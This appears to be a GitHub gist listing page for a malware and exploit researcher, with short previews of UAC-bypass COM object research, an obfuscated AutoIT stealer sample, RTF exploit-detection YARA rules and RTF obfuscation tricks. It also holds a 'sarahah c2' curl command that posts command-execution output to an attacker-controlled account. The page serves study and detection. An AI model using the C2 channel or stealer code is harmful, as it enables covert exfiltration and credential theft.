Chaitanya Haritash ChaitanyaHaritash
ChaitanyaHaritash
/ Autoelevated COM objects
Created
December 18, 2020 12:44
— forked from Elm0D/Autoelevated COM objects
List of COM object with enabled elevation. This does not mean they all useful for bypassing UAC or anything like this. Most of them are not. Some of them like Copy/Move/Rename/Delete/Link Object and Shell Security Editor already used by malware. All others need to be investigated, use OleView from Windows SDK for more info. Snapshots taken from …
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| List of COM object with enabled elevation. This does not mean they all useful for bypassing UAC or anything like this. Most of them are not. Some of them like Copy/Move/Rename/Delete/Link Object and Shell Security Editor already used by malware. All others need to be investigated, use OleView from Windows SDK for more info. | |
| Snapshots taken from clean installs. | |
| Windows 7 SP1 x64, 7601 | |
| WPD Association LUA Virtual Factory | |
| {00393519-3A67-4507-A2B8-85146167ACA7} | |
| Virtual Factory for Biometrics | |
| {0142e4d1-fb7a-11dc-ba4a-000ffe7ab428} |
ChaitanyaHaritash
/ unn
Created
December 4, 2020 10:49
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #https://app.any.run/tasks/bb92dcf2-54cc-4367-bf82-759172cca097/ | |
| #unknown AutoIT script Stealer | |
| #Loading APIs and DLL is interesting part :) | |
| $HCyRUuYT = JNTYAxWoM("73X126X113X86X86X83X80X74X92X121X102X109X114X85X121X80X107X75X75",4) | |
| #NoTrayIcon | |
| Func cSJhQtkUyRrXZlWDXtTU($ZsBQMMuwIlY) | |
| $OGPHIwPXIKzlAM = DllCall (JNTYAxWoM("108X102X115X111X102X109X52X51X47X101X109X109",1), JNTYAxWoM("116X119X118X111",8), JNTYAxWoM("71X101X116X84X105X99X107X67X111X117X110X116",0)) | |
| Global $RQTBElDJFz = 163 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include "Windows.h" | |
| #include <TlHelp32.h> | |
| #include "psapi.h" | |
| #include <iostream> | |
| #pragma (lib , "psapi.lib") | |
| /* | |
| ~ DragonKombat Game is developed by @OsandaMalith | |
| ~ Simple hack!=Hack is written by @bofheaded :P |
ChaitanyaHaritash
/ get_ole_exp.yara
Created
October 7, 2019 13:28
exploit_techniques used in ms office detection via yara signatures
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| rule malrtf_ole2link : exploit | |
| { | |
| meta: | |
| author = "@h3x2b <tracker _AT h3x.eu>" | |
| description = "Detect weaponized RTF documents with OLE2Link exploit" | |
| strings: | |
| //normal rtf beginning | |
| $rtf_format_00 = "{\\rtf1" | |
| //malformed rtf can have for example {\\rtA1 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ; Simple Implementation of WinExec API in FASM | |
| ; @bofheaded | |
| format PE console | |
| entry start | |
| include 'C:\fasm\INCLUDE\WIN32A.INC' | |
| include 'C:\fasm\INCLUDE\API\KERNEL32.inc' | |
| section '.text' code readable executable | |
| ; command to execute |
ChaitanyaHaritash
/ RTF obfuscation techniques.rtf
Created
December 4, 2018 08:17
— forked from mint177/RTF obfuscation techniques.rtf
RTF obfuscation techniques
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| {\rt- RTF SPECIFICATION SUCKS | |
| {\u0097}} | |
| {\uc2 \u0098}}} | |
| {\uc2 \u0099\'**}} | |
| {\uc2 \uc31682 \u0101} | |
| {\u0100}} | |
| {\uc-1 \u0102} | |
| {\object\objemb\objw-\objh- |
ChaitanyaHaritash
/ sarahah c2
Last active
January 22, 2019 12:46
sarahah c2 (small implementation for Idea i had in my mind)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Its a curl implimentation of idea i had in my mind :) i was making a python script for better demo but due to lack of time, i was | |
| able to make only curl payload, i hope it'll give some understanding of what i was thinking lol | |
| curl -i -s -k -X 'POST' \ | |
| -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0' -H 'Referer: https://Attacker.sarahah.com/' -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'X-Requested-With: XMLHttpRequest' \ | |
| -b '.AspNetCore.Antiforgery.w5W7x28NAIs=<<<CSRF Token(I guess, im not good in webapps)>>>' \ | |
| --data-binary $'__RequestVerificationToken=<<Request Verification Token>>&userId=<<User ID of Attacker>>&text=<<System Command Execution response>>&captchaResponse=' \ | |
| 'https://Attacker.sarahah.com/Messages/SendMessage' |